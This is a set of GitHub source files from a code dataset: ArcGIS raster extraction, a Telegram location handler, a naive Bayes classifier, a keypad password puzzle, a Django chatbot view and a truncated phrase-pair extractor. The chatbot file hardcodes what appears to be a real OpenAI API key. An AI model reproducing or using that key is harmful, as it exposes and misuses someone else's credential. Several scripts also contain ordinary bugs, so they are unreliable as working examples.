trained Model\n train_metric_artifact = PartialModelTrainerMetricArtifact(f1_score=scores[0][1],\n precision_score=scores[1][1],\n recall_score=scores[2][1])\n\n\n logger.info(f\"Model trainer train metric: {train_metric_artifact}\")\n\n \n scores = self.get_scores(dataframe=test_df_prediction,metric_names=self.trainer_config.metric_list)\n \n test_metric_artifact = PartialModelTrainerMetricArtifact(f1_score=scores[0][1],\n precision_score=scores[1][1],\n recall_score=scores[2][1])\n\n logger.info(f\"Model trainer test metric: {test_metric_artifact}\")\n ref_artifact = self.export_trained_model(model=trained_model)\n model_trainer_artifact = ModelTrainingArtifact(model_trainer_ref_artifact=ref_artifact,\n model_trainer_train_metric_artifact=train_metric_artifact,\n model_trainer_test_metric_artifact=test_metric_artifact)\n\n logger.info(f\"Model trainer artifact: {model_trainer_artifact}\")\n\n return model_trainer_artifact\n except Exception as exp:\n raise FinanceException(exp,sys)","repo_name":"cr21/finanace-complaint","sub_path":"src/component/training/model_trainer.py","file_name":"model_trainer.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35178755914","text":"# D:\\Data10\\FloodDS\\floodds.gdb\\Layers\\Catchment D:\\Data10\\FloodDS\\Layers\\fillgrid10 c:\\temp 1 1\n# D:\\Projects\\Branches\\10.3_Final\\ArcHydroTools\\srcPy\\AHMain\\Scripts\\ArcHydro>python extractraster.py D:\\Data10\\FloodDS\\floodds.gdb\\Layers\\Catchment D:\\Data10\\FloodDS\\Layers\\fillgrid10 c:\\temp 2 2\nimport sys\nimport os\nimport time \nimport datetime\nimport multiprocessing\n\nimport arcpy\nimport apwrutils\n\n\ndef trace():\n import traceback, inspect\n tb = sys.exc_info()[2]\n tbinfo = traceback.format_tb(tb)[0]\n # script name + line number\n line = tbinfo.split(\", \")[1]\n filename = inspect.getfile(inspect.currentframe())\n # Get Python syntax error\n synerror = traceback.format_exc().splitlines()[-1]\n return line, filename, synerror\n\n''' Extract raster based on polygon (ExtractByMask or ExtractByPolygon) \n the code is written to test applying multiprocessing module extract gp operation. 
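\n\n    Usage sketch (added, hedged; it mirrors the example invocations in the header\n    comments at the top of this file, and the placeholders are illustrative):\n        python extractraster.py <polyFC> <raster> <outFolder> <opType 0|1> <nProcessors>\n    Each worker process receives its own subset of polygons in a separate FileGDB\n    and clips the raster one feature at a time.\n    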
'''\nclass ApExtractRaster:\n #variables:\n def __init__(self):\n self.DebugLevel = 0\n\n def __exit__(self, type, value, traceback):\n if((self.DebugLevel & 2) ==2):\n apwrutils.Utils.ShowMsg(self.thisFileName() + \" completed at \" + time.ctime()) \n \n def thisFileName(self):\n import inspect\n return inspect.getfile(inspect.currentframe())\n\n def getWorkspace(self, pFL):\n oDesc = arcpy.Describe(pFL)\n ooDesc = arcpy.Describe(oDesc.path)\n if(ooDesc.dataType=='FeatureDataset'):\n sWorkspace = ooDesc.path\n else:\n sWorkspace = oDesc.path\n\n return sWorkspace\n \n \"\"\" execute(self, pPolyFC, pRaster, pFolder, opType=0:ByMask,1:ByPolygon) \"\"\"\n def execute(self, pPolyFC, pRaster, pFolder, pScratchWorkspace = None, opType = 0):\n sOK = apwrutils.C_OK \n arcpy.CheckOutExtension(\"Spatial\")\n arcpy.env.overwriteOutput = True \n oDesc = arcpy.Describe(pRaster)\n sName = oDesc.name \n try:\n if(pScratchWorkspace!=None):\n arcpy.env.scratchWorkspace = pScratchWorkspace\n arcpy.AddMessage(\"pScratchWorkspace={}\".format(pScratchWorkspace))\n ds = time.clock()\n iCnt = 0\n with arcpy.da.SearchCursor(pPolyFC, [apwrutils.FN_ShapeAt, apwrutils.FN_HYDROID]) as rows:\n for row in rows:\n iCnt = iCnt + 1\n oShp = row[0]\n idPoly = row[1]\n oExt = oShp.extent\n arcpy.env.extent = oExt \n sOutName = os.path.join(pFolder, \"R{}\".format(idPoly))\n sMsg = \"\" \n try:\n if(opType==0):\n idRaster = arcpy.sa.ExtractByMask(pRaster, oShp)\n idRaster.save(sOutName)\n sMsg = \"{}. {} ExtractByMask({}, pPolygon)->{}\".format(iCnt, idPoly, sName, sOutName)\n else:\n pnt = arcpy.Point()\n pntArray = arcpy.Array() \n nParts = oShp.partCount\n lPoints = []\n for i in range(0, nParts):\n pnts = oShp.getPart(i)\n for pnt in pnts:\n lPoints.append(pnt)\n idRaster = arcpy.sa.ExtractByPolygon(pRaster, lPoints, 'INSIDE') #, 'INSIDE') #'OUTSIDE'\n idRaster.save(sOutName)\n sMsg = \"{}. {} ExtractByPolygon({}, pPolygon(of {} vertices))->{}\".format(iCnt, idPoly, sName, len(lPoints), sOutName)\n\n except:\n arcpy.AddMessage(\"id={} {}\".format(idPoly, trace()))\n\n arcpy.AddMessage(\"{}. 
dt={}\".format(sMsg, apwrutils.Utils.GetDSMsg(ds)))\n ds = time.clock() \n except arcpy.ExecuteError:\n sMsg = \"{} {}\".format(arcpy.GetMessages(2), trace())\n arcpy.AddError(sMsg)\n except:\n arcpy.AddMessage(trace())\n sOK = apwrutils.C_NOTOK\n\n return sOK, pFolder \n \nif __name__ == '__main__':\n #oProcessor = None\n try:\n debugLevel = 0\n inPolyFC = arcpy.GetParameterAsText(0)\n inRaster = arcpy.GetParameterAsText(1)\n pFolder = arcpy.GetParameterAsText(2)\n opType = arcpy.GetParameterAsText(3)\n nProcessors = arcpy.GetParameterAsText(4)\n \n arcpy.env.overwriteOutput = True\n try:\n opType = int(opType)\n except:\n opType = 0\n\n lProcesses = []\n try:\n nProcessors = int(nProcessors)\n except:\n nProcessors = 1\n \n\n arcpy.CheckOutExtension(\"Spatial\") \n\n ddt = time.clock()\n oProcessor = ApExtractRaster()\n oProcessor.DebugLevel = debugLevel\n #..makesure HYDROID exists and populated\n oDesc = arcpy.Describe(inPolyFC)\n oidFieldName = oDesc.oidFieldName\n sName = oDesc.name \n if(apwrutils.Utils.FieldExist(oDesc, apwrutils.FN_HYDROID)==False):\n dFields = {apwrutils.FN_HYDROID :'LONG'}\n apwrutils.Utils.addFields(inPolyFC, dFields)\n srcField = \"!{}!\".format(oidFieldName)\n arcpy.CalculateField_management(inPolyFC, flooddsconfig.FN_HYDROID, -1, \"PYTHON\") \n\n if(nProcessors==1):\n tReturns = oProcessor.execute(inPolyFC, inRaster, pFolder, None, opType)\n if(tReturns[0] == apwrutils.C_OK): \n pFolder = tReturns[1]\n arcpy.AddMessage(pFolder)\n arcpy.SetParameterAsText(4, pFolder)\n else:\n pWorkspace = apwrutils.Utils.getWorkspace(inPolyFC) \n nTotal = int(arcpy.GetCount_management(inPolyFC)[0])\n pStatTable = os.path.join(pWorkspace, \"{}_Stats\".format(sName))\n nMin = 0\n nMax = nTotal\n arcpy.Statistics_analysis(inPolyFC, pStatTable, [[oidFieldName,\"MIN\"],[oidFieldName,\"MAX\"]])\n with arcpy.da.SearchCursor(pStatTable, [\"MIN_{}\".format(oidFieldName),\"MAX_{}\".format(oidFieldName)]) as rows:\n for row in rows:\n nMin = row[0]\n nMax = row[1]\n\n #..Construct the whereclause \n #..Select the Catchments\n #..Use catchment to select the lines,\n #..Use catchment to select the 10-85 points.\n nTotal = int(arcpy.GetCount_management(inPolyFC)[0])\n dCnt = int(nTotal/nProcessors) + 1 \n nLower = 0\n nUpper = 0\n for iProcess in range(nProcessors):\n nLower = 0 + dCnt*iProcess\n nUpper = nLower + dCnt\n sWhere = \"{} > {} and {} <= {}\".format(oidFieldName, nLower, oidFieldName, nUpper) \n arcpy.AddMessage(\"sWhere={}\".format(sWhere))\n pFLPoly = \"{}{}\".format(sName, iProcess) \n arcpy.MakeFeatureLayer_management(inPolyFC, pFLPoly, sWhere) \n \n pFolderPS = os.path.join(pFolder, \"Proc{}\".format(iProcess))\n wksName = \"wks{}.gdb\".format(iProcess )\n pwks = os.path.join(pFolderPS, wksName) \n apwrutils.Utils.makeSureDirExists(pFolderPS)\n pwks = os.path.join(pFolderPS, wksName) \n if(arcpy.Exists(pwks)==False):\n arcpy.CreateFileGDB_management(pFolderPS, wksName) #arcpy.CreateFileGDB_management(sCurDir, sWKS)\n arcpy.AddMessage(\"FWKS: {} is created.\".format(pwks))\n else:\n arcpy.Delete_management(pwks)\n arcpy.AddMessage(\"FWKS: {} is deleted.\".format(pwks)) \n arcpy.CreateFileGDB_management(pFolderPS, wksName) #arcpy.CreateFileGDB_management(sCurDir, sWKS)\n arcpy.AddMessage(\"FWKS: {} is created.\".format(pwks))\n\n pFCPolyProc = os.path.join(pwks, \"{}_{}\".format(sName,iProcess )) \n arcpy.CopyFeatures_management(pFLPoly, pFCPolyProc) \n \n ds1 = time.clock()\n arcpy.AddMessage(\"running extractraster.execute({} {} {} {})\".format(pFCPolyProc, inRaster, 
                params = (pFCPolyProc, inRaster, pFolder, pwks, opType) \n                oProcessor.DebugLevel = debugLevel\n                p = multiprocessing.Process(target=oProcessor.execute, args=params)\n                lProcesses.append(p) \n                p.start() \n             \n            \n        if(nProcessors>1): \n            for p in lProcesses:\n                print(\"{} joined\".format(str(p)))\n                p.join()\n\n            interval = 10  # seconds between status polls (assumed value; 'interval' was undefined in the original)\n            while len(multiprocessing.active_children()) > 0:\n                nProc = len(multiprocessing.active_children())\n                sMsg = \"Current active processes={}, {}\".format(nProc, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n                arcpy.AddMessage(sMsg) \n                for actProcess in multiprocessing.active_children():\n                    dt = (time.clock() - ddt)  # elapsed since the overall start ('ds' is not defined in this scope)\n                    dt = round(dt,2)\n                    arcpy.AddMessage(\"  {} dt={}\".format(str(actProcess), dt ))\n                time.sleep(interval) \n        \n        \n    except arcpy.ExecuteError:\n        print (str(arcpy.GetMessages(2)))\n        arcpy.AddError(str(arcpy.GetMessages(2)))\n    except:\n        print (trace())\n        arcpy.AddError(str(trace()))\n        arcpy.AddError(str(arcpy.GetMessages(2)))\n    finally:\n        if(oProcessor!=None):\n            del oProcessor\n        arcpy.AddMessage(\"Total processing time dt={}\".format(apwrutils.Utils.GetDSMsg(ddt)))\n        dt = datetime.datetime.now()\n        print ('Finished at ' + dt.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n\n\n","repo_name":"zye4252264/ArcHydro-FloodDS","sub_path":"FDS201704202055/srcPy/Scripts/ArcHydro/extractraster.py","file_name":"extractraster.py","file_ext":"py","file_size_in_byte":9980,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"}
{"seq_id":"14239647963","text":"import logging\n\nfrom handlers.dataHandler import DataHandler\nfrom telebot.types import Location\nfrom telebot.types import Venue\nlogger = logging.getLogger()\nimport support.geocode as gserv\n\nclass LocationDataHandler(DataHandler):\n\n    def handleData(self, bot, message, response):\n        venue=message.venue\n        location=message.location\n        alamat=message.text\n        outvenue=None\n        logger.debug('inside handle data')\n\n        if location is None and venue is None and alamat is not None:\n            logger.debug('do geo coding')\n            #get reverse geo coding from Alamat\n            outgps=gserv.getLatLng(alamat)\n            if outgps['lat']==gserv.errorLat and outgps['lng']==gserv.errorLng:\n                outalamat=alamat+' (tidak dikenal)\\n(mungkin beda di peta)'\n            else:\n                outalamat=alamat\n            locationTemp=Location(outgps['lng'],outgps['lat'])\n            outvenue=Venue(locationTemp,'',outalamat,None)\n            message.venue=outvenue\n        elif (venue is not None and location is not None):\n            outvenue=venue\n            logger.debug('venue is sent')\n        elif (venue is not None and location is None):\n            outvenue=venue\n            logger.debug('venue is sent')\n        elif (location is not None and venue is None):\n            #get geocoding\n            outgps=gserv.getAddress(location.latitude,location.longitude)\n            outalamat=outgps\n            outvenue=Venue(location,'',outalamat,None)\n            # outvenue={'location':location,'alamat':'GPS saya'}\n            # logger.info('alamat is added to location')\n        elif (alamat is None and location is not None and venue is None):\n            locationTemp=Location(-6.311525,106.829285)\n            outvenue=Venue(locationTemp,'','tidak diketahui',None)\n            # location={'latitude':-6.311525 , 'longitude':106.829285}\n            # outvenue={'location':location,'alamat':'not specified'}\n            logger.info('venue is synthesized')\n        self.dbhandler(bot, message, outvenue, response)\n\n    def dbhandler(self, bot, message, outvenue, response):\n        
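# Added note (hedged): extension hook; subclasses are expected to persist or\n        # forward the resolved venue, so the base implementation intentionally does nothing.\n        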
pass\n","repo_name":"indosandi/sanfrabot","sub_path":"handlers/locationDataHandler.py","file_name":"locationDataHandler.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"32656778775","text":"import numpy as np\nimport re\nimport random\n\n'''词表到向量的转换函数'''\ndef loadDataSet():\n postingList = [\n ['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],\n ['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],\n ['my', 'dalmation', 'is', 'so', 'cute', 'I', 'love', 'him'],\n ['stop', 'posting', 'stupid', 'worthless', 'garbage'],\n ['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],\n ['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']\n ]\n classVec = [0, 1, 0, 1, 0, 1] # 1 is abusive, 0 not\n return postingList, classVec\n\n\n'''词汇列表'''\ndef createVocabList(dataSet):\n vocabSet = set([]) # create empty set\n for document in dataSet:\n vocabSet = vocabSet | set(document) # union of the two sets\n return list(vocabSet)\n\n\n'''获取词向量'''\ndef setOfWords2Vec(vocabList, inputSet):\n returnVec = [0] * len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] = 1\n else:\n print(\"the word: %s is not in my Vocabulary!\" % word)\n return returnVec\n\n\n'''朴素贝叶斯训练函数'''\ndef trainNB0(trainMatrix, trainCategory):\n numTrainDocs = len(trainMatrix)\n numWords = len(trainMatrix[0])\n pAbusive = sum(trainCategory) / float(numTrainDocs)\n p0Num = np.ones(numWords); p1Num = np.ones(numWords) # change to 1 for np.log()\n print(\"p0Num=\", p0Num)\n print(\"p1Num=\", p1Num)\n p0Denom = 0.0; p1Denom = 0.0\n for i in range(numTrainDocs):\n if trainCategory[i] == 1:\n # print(\"p1Num=\", p1Num, \" p1Denom=\", p1Denom)\n p1Num += trainMatrix[i]\n p1Denom += sum(trainMatrix[i])\n print(\"p1Num=\", p1Num, \" p1Denom=\", p1Denom, \" sum mat i=\", sum(trainMatrix[i]))\n else:\n # print(\"p0Num=\", p0Num, \" p0Denom=\", p0Denom)\n p0Num += trainMatrix[i]\n p0Denom += sum(trainMatrix[i])\n print(\"p0Num=\", p0Num, \" p0Denom=\", p0Denom, \" sum mat i=\", sum(trainMatrix[i]))\n p1Vect = np.log(p1Num/p1Denom) # change to np.log()\n p0Vect = np.log(p0Num/p0Denom) # change to np.log()\n return p0Vect, p1Vect, pAbusive\n\n\n'''朴素贝叶斯分类函数'''\ndef classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):\n p1 = sum(vec2Classify * p1Vec) + np.log(pClass1)\n p0 = sum(vec2Classify * p0Vec) + np.log(1.0 - pClass1)\n if p1 > p0:\n return 1\n else:\n return 0\n\ndef testingNB():\n listOPosts, listClasses = loadDataSet()\n myVocabList = createVocabList(listOPosts)\n trainMat = []\n for postinDoc in listOPosts:\n trainMat.append(setOfWords2Vec(myVocabList, postinDoc))\n for mat in trainMat:\n print(\"trainMat=\", mat)\n p0V, p1V, pAb = trainNB0(np.array(trainMat), np.array(listClasses))\n testEntry = ['love', 'my', 'dalmation']\n thisDoc = np.array(setOfWords2Vec(myVocabList, testEntry))\n print(\"testEntry=\", testEntry, \" classified as: \", classifyNB(thisDoc, p0V, p1V, pAb))\n testEntry = ['stupid', 'garbage']\n thisDoc = np.array(setOfWords2Vec(myVocabList, testEntry))\n print(\"testEntry=\", testEntry, \" classified as: \", classifyNB(thisDoc, p0V, p1V, pAb))\n\n\n'''朴素贝叶斯词袋模型'''\ndef bagOfWords2VecMN(vocabList, inputSet):\n returnVec = [0] * len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] += 1\n return returnVec\n\n'''文件解析'''\ndef textParse(bigString):\n listOfTokens = re.split(r'\\w*', bigString)\n return 
\n\n'''Spam email classification'''\ndef spamTest():\n    # tuple unpacking; the original chained assignment 'docList = [], classList = [], ...'\n    # raises ValueError at runtime\n    docList, classList, fullText = [], [], []\n    for i in range(1, 26):\n        wordList = textParse(open('email/spam/%d.txt' % i).read())\n        docList.append(wordList)\n        fullText.extend(wordList)\n        classList.append(1)\n        wordList = textParse(open('email/ham/%d.txt' % i).read())\n        docList.append(wordList)\n        fullText.extend(wordList)\n        classList.append(0)\n    vocabList = createVocabList(docList)\n    trainingSet = list(range(50)); testSet = []  # list() so the del below works in Python 3\n    for i in range(10):\n        randIndex = int(random.uniform(0, len(trainingSet)))\n        testSet.append(trainingSet[randIndex])\n        del(trainingSet[randIndex])\n    trainMat = []; trainClasses = []\n    for docIndex in trainingSet:\n        trainMat.append(setOfWords2Vec(vocabList, docList[docIndex]))\n        trainClasses.append(classList[docIndex])\n    p0V, p1V, pSpam = trainNB0(np.array(trainMat), np.array(trainClasses))\n    errorCount = 0\n    for docIndex in testSet:\n        wordVector = setOfWords2Vec(vocabList, docList[docIndex])\n        if classifyNB(np.array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:\n            errorCount += 1\n    print(\"the error rate is: \", float(errorCount) / len(testSet))\n\n\n'''RSS feed classifier and frequent-word removal functions'''\ndef calcMostFreq(vocabList, fullText):\n    import operator\n    freqDict = {}\n    for token in vocabList:\n        freqDict[token] = fullText.count(token)\n    sortedFreq = sorted(freqDict.items(), key=operator.itemgetter(1), reverse=True)\n    return sortedFreq[:30]\n\ndef localWords(feed1, feed0):\n    import feedparser\n    docList, classList, fullText = [], [], []\n    minLen = min(len(feed1['entries']), len(feed0['entries']))\n    for i in range(minLen):\n        wordList = textParse(feed1['entries'][i]['summary'])\n        docList.append(wordList)\n        fullText.extend(wordList)\n        classList.append(1)\n        wordList = textParse(feed0['entries'][i]['summary'])\n        docList.append(wordList)\n        fullText.extend(wordList)\n        classList.append(0)\n    vocabList = createVocabList(docList)\n    top30Words = calcMostFreq(vocabList, fullText)\n    for pairW in top30Words:\n        if pairW[0] in vocabList:\n            vocabList.remove(pairW[0])\n    trainingSet = list(range(2 * minLen)); testSet = []\n    for i in range(20):\n        randIndex = int(random.uniform(0, len(trainingSet)))\n        testSet.append(trainingSet[randIndex])\n        del(trainingSet[randIndex])\n    trainMat = []; trainClasses = []\n    for docIndex in trainingSet:\n        trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\n        trainClasses.append(classList[docIndex])\n    p0V, p1V, pSpam = trainNB0(np.array(trainMat), np.array(trainClasses))\n    errorCount = 0\n    for docIndex in testSet:\n        wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])\n        if classifyNB(np.array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:\n            errorCount += 1\n    print(\"the error rate is: \", float(errorCount)/len(testSet))\n    return vocabList, p0V, p1V\n\n\n'''Display the most characteristic words'''\ndef getTopWords(ny, sf):\n    import operator\n    vocabList, p0V, p1V=localWords(ny, sf)\n    topNY, topSF = [], []\n    for i in range(len(p0V)):\n        if p0V[i] > -6.0 :\n            topSF.append((vocabList[i], p0V[i]))\n        if p1V[i] > -6.0 :\n            topNY.append((vocabList[i], p1V[i]))\n    sortedSF = sorted(topSF, key=lambda pair: pair[1], reverse=True)\n    print(\"SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**\")\n    for item in sortedSF:\n        print(item[0])\n    sortedNY = sorted(topNY, key=lambda pair: pair[1], reverse=True)\n    print(\"NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**\")\n    for item in sortedNY:\n        print(item[0])\n
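\n\n# Added usage sketch (hedged; the feed URLs are the ones commonly used with this\n# textbook exercise and are assumptions, not taken from this file):\n#   import feedparser\n#   ny = feedparser.parse('http://newyork.craigslist.org/stp/index.rss')\n#   sf = feedparser.parse('http://sfbay.craigslist.org/stp/index.rss')\n#   getTopWords(ny, sf)  # prints the most characteristic words per region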
\n\n# postList, classList = loadDataSet()\n# myVocabList = createVocabList(postList)\n# print(myVocabList)\n# print(setOfWords2Vec(myVocabList, postList[0]))\n# trainMat = []\n# for postinDoc in postList:\n#     trainMat.append(setOfWords2Vec(myVocabList, postinDoc))\n# print(\"trainMat=\\n\", trainMat)\n# p0Vect, p1Vect, pAbusive = trainNB0(trainMat, classList)\n# print(\"p0Vect=\", p0Vect, \"\\np1Vect=\", p1Vect, \"\\npAbusive=\", pAbusive)\ntestingNB()\n","repo_name":"zrfan/mlGuide","sub_path":"code/mLInAction/Bayes/bayes.py","file_name":"bayes.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
{"seq_id":"37895801109","text":"# coding=utf-8\n\"\"\"\nProblem description\nPasswords matter: our little secrets all depend on them. Yuanzi now wants to layer one\nmore cipher on top of his password; it is simple but safe enough.\nSuppose Yuanzi's password on a BBS used to be zvbo9441987. To make it easy to remember,\nhe transforms it with an algorithm into YUANzhi1987, which is his name plus his year of\nbirth. He can never forget it, and he can even leave it in plain sight without anyone\nlearning the real password.\nThe transformation uses the letters on a phone keypad:\n1--1, abc--2, def--3, ghi--4, jkl--5, mno--6, pqrs--7, tuv--8, wxyz--9, 0--0.\nEvery lowercase letter in the password becomes its keypad digit; digits and other\nsymbols are left unchanged.\n\nNote: the password contains no spaces. An uppercase letter becomes lowercase and is\nthen shifted one position forward: X first becomes lowercase x, then shifts to y.\nSimple. Remember that z wraps around to a.\n\nInput description:\nThe input holds multiple test cases. Each line is a plaintext password of at most 100\ncharacters; read until end of file.\n\nOutput description:\nOutput Yuanzi's real ciphertext.\n\nExample 1\nInput\nYUANzhi1987\nOutput\nzvbo9441987\n\"\"\"\n\n# Method 1\nwhile 1:\n    try:\n        s = input()\n        result = []\n        for c in s:\n            if c in 'abc':\n                result.append('2')\n            elif c in 'def':\n                result.append('3')\n            elif c in 'ghi':\n                result.append('4')\n            elif c in 'jkl':\n                result.append('5')\n            elif c in 'mno':\n                result.append('6')\n            elif c in 'pqrs':\n                result.append('7')\n            elif c in 'tuv':\n                result.append('8')\n            elif c in 'wxyz':\n                result.append('9')\n            elif c.isupper():\n                if c == 'Z':\n                    result.append('a')\n                else:\n                    result.append(chr(ord(c) + 1).lower())\n            else:\n                result.append(c)\n        print(''.join(result))\n    except:\n        break\n\n\n# Method 2\nd = {\n    \"abc\": 2,\n    \"def\": 3,\n    \"ghi\": 4,\n    \"jkl\": 5,\n    \"mno\": 6,\n    \"pqrs\": 7,\n    \"tuv\": 8,\n    \"wxyz\": 9,\n\n}\nwhile True:\n    try:\n        a, res = input(), \"\"\n        for i in a:\n            if i.isupper():\n                if i != \"Z\":\n                    res += chr(ord(i.lower()) + 1)\n                else:\n                    res += \"a\"\n            elif i.islower():\n                for j in d.keys():\n                    if i in j:\n                        res += str(d[j])\n                        break\n            else:\n                res += i\n        print(res)\n\n    except:\n        break\n","repo_name":"susebing/HJ108","sub_path":"pass/HJ21 简单密码破解.py","file_name":"HJ21 简单密码破解.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"72058626703","text":"from django.shortcuts import render\r\nfrom django.http import JsonResponse\r\nimport openai\r\n\r\nopenai_api_key = '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'\r\nopenai.api_key = openai_api_key\r\n\r\ndef ask_openai(message):\r\n    response = openai.Completion.create(\r\n        model = \"text-davinci-003\",\r\n        prompt = message,\r\n        max_tokens = 150,\r\n        n = 1,\r\n        stop = None,\r\n        temperature = 0.7,\r\n    )\r\n    # return the generated text; the original built the completion but never returned it\r\n    return response.choices[0].text.strip()\r\n# Create your views here.\r\ndef chatbot(request):\r\n    if request.method == 'POST':\r\n        message = request.POST.get('message')\r\n        response = 'HI THIS IS MY RESPONSE'\r\n        return JsonResponse({'message':message,'response': response})\r\n    return render(request, 'chatbot.html')","repo_name":"sarthakboy/Chat-webapp","sub_path":"chatbot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"5346986721","text":"# phrase pair extractor\n\n\"\"\"\nBy Michael Cabot (6047262) and Sander Nugteren (6042023)\n\"\"\"\n\n#import argparse\nfrom collections import Counter\nimport sys\n
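\n# Added worked example (hedged, not from the original): given the counts\n#   phrase_pair_freqs = {('la maison', 'the house'): 2}\n#   l2_phrase_freqs   = {'the house': 4}\n# conditional_probabilities() below yields P(l1 | l2) = 2/4 = 0.5 for that pair.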
\ndef conditional_probabilities(phrase_pair_freqs, \n                              l1_phrase_freqs, l2_phrase_freqs):\n    \"\"\"Calculate the conditional probability of phrase pairs in both directions.\n    \n    Keyword arguments:\n    phrase_pair_freqs -- counter of phrase pairs\n    l1_phrase_freqs -- counter of phrases in language 1\n    l2_phrase_freqs -- counter of phrases in language 2\n    \n    Returns 2 dictionaries mapping a phrase pair to P(l1 | l2) and P(l2 | l1)\n    \"\"\"\n    l1_given_l2 = {}\n    l2_given_l1 = {}\n    for phrase_pair, freq in phrase_pair_freqs.iteritems():\n        # P(l1 | l2) conditions on the language-2 phrase and P(l2 | l1) on the\n        # language-1 phrase; the original divided by the opposite side's frequency\n        l1_given_l2[phrase_pair] = float(freq) / l2_phrase_freqs[phrase_pair[1]]\n        l2_given_l1[phrase_pair] = float(freq) / l1_phrase_freqs[phrase_pair[0]]\n\n    return l1_given_l2, l2_given_l1\n\ndef phrase_probabilities(phrase_freqs):\n    \"\"\"Calculate the probability of a phrase.\n    \n    Keyword arguments:\n    phrase_freqs -- counter of phrases\n    \n    Returns a dictionary mapping a phrase to its probability\n    \"\"\"\n    freq_sum = sum(phrase_freqs.values())\n    phrase_probs = {}\n    for phrase, freq in phrase_freqs.iteritems():\n        phrase_probs[phrase] = float(freq) / freq_sum\n\n    return phrase_probs\n\ndef lexical_probabilities(phrase_pair_freqs, l1_word_given_l2, l2_word_given_l1, alignments):\n    \"\"\"Calculate the lexical probability of a phrase given the phrase in the other language.\n    \n    Keyword arguments:\n    phrase_pair_freqs -- counter of phrases\n    l1_word_given_l2 -- word probabilities\n    alignments -- dictionary of word alignments for every phrase\n    \n    Returns two dictionaries mapping a phrase pair to its probability\n    \"\"\"\n    l1_lexical_given_l2 = {}\n    l2_lexical_given_l1 = {}\n    for phrase_pair, freq in phrase_pair_freqs.iteritems():\n        words_l1 = phrase_pair[0].split()\n        words_l2 = phrase_pair[1].split()\n        aligns = alignments[phrase_pair]\n        result = 1\n        for word1 in words_l1:\n            sumOf = 0\n            iterations = 0\n            for word2 in words_l2:\n                pair = word1, word2\n                if pair in aligns:\n                    sumOf += l1_word_given_l2[pair]\n                    iterations += 1\n            result *= sumOf/iterations\n        l1_lexical_given_l2[phrase_pair] = result \n        l2_lexical_given_l1[phrase_pair] = result \n        #phrase_probs[phrase_pair] = float(freq) / freq_sum\n\n    return l1_lexical_given_l2, l2_lexical_given_l1\n    \n\ndef joint_probabilities(l1_given_l2, l2_phrase_probs):\n    \"\"\"Calculate the joint probability of a phrase pair:\n    P(l1, l2) = P(l1 | l2) * P(l2)\n    \n    Keyword arguments:\n    l1_given_l2 -- dictionary mapping a phrase pair (l1,l2) to its\n    conditional probability P(l1 | l2)\n    l2_phrase_probs -- dictionary mapping a phrase to its probability\n    \n    Return a dictionary that maps a phrase pair to its joint probability\n    \"\"\"\n    joint_probs = {}\n    for phrase, prob in l1_given_l2.iteritems():\n        joint_probs[phrase] = prob * l2_phrase_probs[phrase[1]]\n\n    return joint_probs\n\ndef add_phrase_alignment(collection, phrase, max_length,\n                         l1_length, l2_length):\n    \"\"\"Add a phrase alignment to a collection if:\n    - its length is smaller or equal to the max length\n    - the alignment is a constituent of the sentences\n    \n    Keyword arguments:\n    collection -- a list or set\n    phrase -- a 4-tuple (min1,min2,max1,max2) denoting the range of\n    the constituents in language 1 and 2\n    max_length -- the maximum length of a phrase in the phrase alignment\n    l1_length -- the length of the sentence in language 1\n    l2_length -- the length of the sentence in language 2\n    \"\"\"\n    if phrase and phrase[2] - phrase[0]+1 <= max_length \\\n            and phrase[3] - phrase[1]+1 <= max_length \\\n            and phrase[0] >= 0 and phrase[1] >= 0 \\\n            and phrase[2] < l1_length and phrase[3] < l2_length:\n        if isinstance(collection, list):\n            collection.append(phrase)\n        elif isinstance(collection, set):\n            collection.add(phrase)\n        else:\n            return NotImplemented\n
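\n# Added worked example (hedged): a phrase alignment (0, 1, 2, 3) means tokens 0..2 of\n# the language-1 sentence align with tokens 1..3 of the language-2 sentence; both\n# spans have length 3, so the check above passes for any max_length of 3 or more.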
\ndef extract_phrase_pair_freqs(alignments_file, language1_file,\n                              language2_file, \n                              max_length = float('inf')):\n    \"\"\"Extract and count the frequency of all phrase pairs given an\n    alignment between sentences.\n    \n    Keyword arguments:\n    alignments_file -- file that contains the alignments\n    language1_file -- file containing sentences from language 1\n    language2_file -- file containing sentences from language 2\n    max_length -- maximum length of phrase pairs\n    \n    Returns counter of phrase pairs, counter of phrases in language 1\n    and counter of phrases in language 2\n    \"\"\"\n    alignments_for_phrases = dict()\n    phrase_pair_freqs = Counter()\n    l1_phrase_freqs = Counter()\n    l2_phrase_freqs = Counter()\n    num_lines = number_of_lines(alignments_file)\n    alignments = open(alignments_file, 'r')\n    language1 = open(language1_file, 'r')\n    language2 = open(language2_file, 'r')\n    \n    for i, str_align in enumerate(alignments):\n        if num_lines > 100:\n            # '==' with integer division; the original identity test 'is 0' is unreliable\n            if i % (num_lines//100) == 0:\n                sys.stdout.write('\\r%d%%' % 